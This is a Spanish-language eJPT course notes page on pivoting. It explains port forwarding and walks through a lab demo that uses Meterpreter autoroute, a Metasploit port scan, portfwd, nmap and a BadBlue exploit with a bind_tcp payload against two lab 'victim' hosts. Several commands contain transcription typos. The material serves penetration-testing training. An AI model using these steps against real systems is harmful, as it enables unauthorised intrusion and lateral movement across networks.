eJPT
  • 👋Welcome
  • Tools
    • 🔭Escaneo y Enumeración
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducción a la Recopilación de Información
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • Port Forwarding
  • Demo: Pivoting
  • Quiz: Pivoting
  1. SECTION 3: Host & Network Penetration Testing
  2. Host & Network Penetration Testing: Post-Exploitation

Pivoting Lesson

PreviousLinux Password HashesNextClearing

Last updated 5 months ago

El pivoteo es una técnica de postexplotación que implica utilizar un host comprometido que está conectado a múltiples redes para obtener acceso a sistemas dentro de otras redes.

Después de obtener acceso a un host, podemos usar el host comprometido para explotar otros hosts en una red interna privada a la que no podíamos acceder anteriormente.

Meterpreter nos brinda la capacidad de agregar una ruta de red a la subred de la red interna, realizar reenvío de puertos y, en consecuencia, escanear y explotar otros sistemas en la red.

Port Forwarding

El reenvío de puertos o Port Fordwarding es el proceso de redirigir el tráfico desde un puerto específico en un sistema de destino a un puerto específico en nuestro sistema.

En el contexto del pivoteo, podemos reenviar un puerto remoto en un host previamente inaccesible a un puerto local en nuestro sistema Kali Linux para que podamos interactuar/explotar de forma remota el servicio que se ejecuta en el puerto.

Demo: Pivoting

Victim Machine 1: 10.0.29.14
Victim Machine 2: 10.0.29.96

# Post explotacion de la victima 1
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ipconfig
# Crear una ruta con la subred que tiene configurado la vitima en la interfaz
meterpreter > run autoroute -s 10.0.29.0/20
# Ver todas las rutas 
meterpreter > run autoroute -p
# Poner en backgraound la sesion de meterpreter

# Buscar el escaneo de puertos
msf6 exploit(windows/http/rejetto_hfs_exec) > search portscan
msf6 exploit(windows/http/rejetto_hfs_exec) > use 5
msf6 auxiliary(scanner/portscan/tcp) > show options
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.29.96
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-100
msf6 auxiliary(scanner/portscan/tcp) > exploit
# Solo LE DIRA LOS PUERTOS ABIERTOS
# Pero si quiere saber mas de la versioon del servicio tiene que hacer un forddwarding
# Por lo cual debera de hacer un port fordwarding

# Ingresamos nuevamente a la sesion
sf6 auxiliary(scanner/portscan/tcp) > sessions
sf6 auxiliary(scanner/portscan/tcp) > sessions 1

meterpreter > portfwd add -1 1234 -p 80 -r 10.0.29.96
# Scaneo  con NMAP
root@attackdefense:—# nmap -sv -p 1234 localhost
# DESPUES DE HABER IDENTIFICADO LA VERSION VULNERABLE
# Lo explotamos
msf6 auxiliary(scanner/portscan/tcp) > search BadBlue
msf6 auxiliary(scanner%portscanltcp) > use 1
msf6 auxiliary(scanner%portscanltcp) > set payload windows/meterpreter/bind_tcp
msf6 auxiliary(scanner%portscanltcp) > set RHOSTS 10.0.29.96
msf6 auxiliary(scanner%portscanltcp) > exploit
meterpreter > sysinfo

Quiz: Pivoting